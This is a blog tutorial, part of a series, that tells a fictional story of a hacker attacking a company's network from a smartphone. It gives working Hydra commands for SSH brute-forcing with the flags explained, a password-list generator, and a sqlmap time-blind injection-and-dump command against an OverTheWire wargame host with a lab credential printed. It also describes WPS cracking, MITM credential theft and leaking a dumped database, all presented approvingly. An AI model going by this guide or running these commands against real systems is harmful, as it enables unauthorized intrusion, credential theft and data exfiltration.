My Phone Is a War Machine (Sqlmap, Hydra, Reaver…)

Now, we’ll reveal the full potential of our smartphone.

Please note that there’s enough free space to have all the Tools we used since part 1 installed.

–Keep in Mind that at each chapter you’ll need to launch Linux Deploy, tap “Start”, and then SSH android@localhost and type in changeme —

If you followed my previous post, you know that :

Our hero, john went for a travel business to New York. He successfully unlocked and hacked two computers and a phone.
Then, he got friend with a man that works in a Management Enterprise. He used his phone to perform a MITM attack to steal credentials from his new friend’s enterprise’s network.
He finally took the plane to get back home, but landed for a few hours in Chicago’s airport. Bored, he used his phone to perform a vuln scan on this enterprise’s hidden servers and used metasploit to exploit the heartbleed vuln
He discovered the enterprise is ploting for web domination, and that the heart of this plot is based in Japan – Okinawa – Naha in a Mass-Survellance Enterprise. He decide to fly to Naha (capital of Okinawa) and stop this threat.

0) SCENARIO

Okay. I’m in Naha right now. Our target is clear : This Enterprise’s servers.

I performed a vuln scan, and it seems they’re very well protected. So I decide to attack a weak point : It’s internal network.

My phone allows me a great mobility. That’s why I have to get close to their offices which are located in Okinawa’s greated tower :

But obviously I can’t just get into their offices and wait for my attack to crack the network’s password. So I get on nearby rooftop and I fire up my phone, with some special material…

Using Reaver I sucessfully cracked their network. Now I can scan their LAN using nmap.

Nice ! I found a Telnet and a SSH port open. Let’s try to hack it !

FIRE ! I GRAB MY PHONE !!

I) MAIN IDEA

We’ll simply try to bruteforce the admin’s ssh account using THC-Hydra. If that doesn’t work, then we’ll try to find another vulnerability… Maybe one like Sony’s hack ? (sqli)

II) REQUIREMENTS
THC-Hydra
apt-get install hydra

Sqlmap :
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap
python sqlmap.py

III) LET’S GO !

To bruteforce a SSH account for example, use the following command :
hydra -l admin -t 12 -f -x 8:10:a1% 10.10.0.2 -s 22 -v -V ssh

-l : Specify login
-t 12: Number of thread : You’ll have to optimize it according to your server
-f : exit after first password found
-x : bruteforce min-max number of char, followed by the charset you want : a1% -> lowcase letters, numbers, and ‘%’
-s : port
ssh : the service to attack

To use a dictionary list :
hydra -l admin -t 12 -f -P password.list 10.10.0.2 -s 22 -v -V ssh

To generate for example random strings to crack the admin password (8 char) :
cat /dev/urandom | tr -dc ‘a-z0-9’ | fold -w 8 | head -n 100000 > password.lst

Screenshots ?

Hydra’s attack :

IV) YES BUT…
I won’t stay a whole night on my roof trying to crack a random password…

That’s why I decide to launch my MITM attack with my imporved script (take a look at the end of this post I edited it and improved the script)

I get credentials from a little priviledged user account. But it’ll be okay.
I explore the network and I found an authentification page to find the admin’s account !
I bet there’s a possible SQL injection, but I need to enter first the user’s credentials… :

Once the user’s credentials entered, here’s what I’m prompted :

 

Well… Just hack it !

Fire up Sqlmap :

python sqlmap.py -u “natas17.natas.labs.overthewire.org” –auth-type=BASIC –auth-cred=”natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw” –data “username=natas18” –dbms=MySQL –technique=T –level=5 –risk=3 –dump

-u : specify target’s URL

–auth-type and –auth-cred : Type of authentification and our user’s crendentials. (Huh… Take a look at this string, I couldn’t have cracked it with Hydra..)

–data : Our injection !
–dbms : The… dbms
-T : To force a time-blind injection
–level –risk : max level of injection
–dump : dump database.

Screenshots ?

And… DUMP ! (i volontary stopped the attack, not to show the creds)

IV) POST-EXPLOITATION

Once I’ve got the admin’s credentials, I now have full access to ther server’s database from my phone !

I don’t lose any time, I directly upload all their files on distants servers. Sent to Wikileaks, press agencies, media sharing websites.

Here’s how you can hack almost anything from your pocket…

Buuuuutt ! Safety first ! I know they’ve detected my intrusion
And I already know they’re searching me and calling authorities.

Gotta run and disappear…

V) CONCLUSION

Hey there! Finally, I think I have convinced you that your phone is a Hacking Vector just like your PC or a Raspberry PI.

From here, you’ve learn to use your favorite Tools on your phone and get through the “command line only” restriction.

What happened to John, our hero ? Well huh, maybe I play too much video games, but let’s tell us he became Aiden Pearce ?

Anyway, when reality meets fictions…

Posted By
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s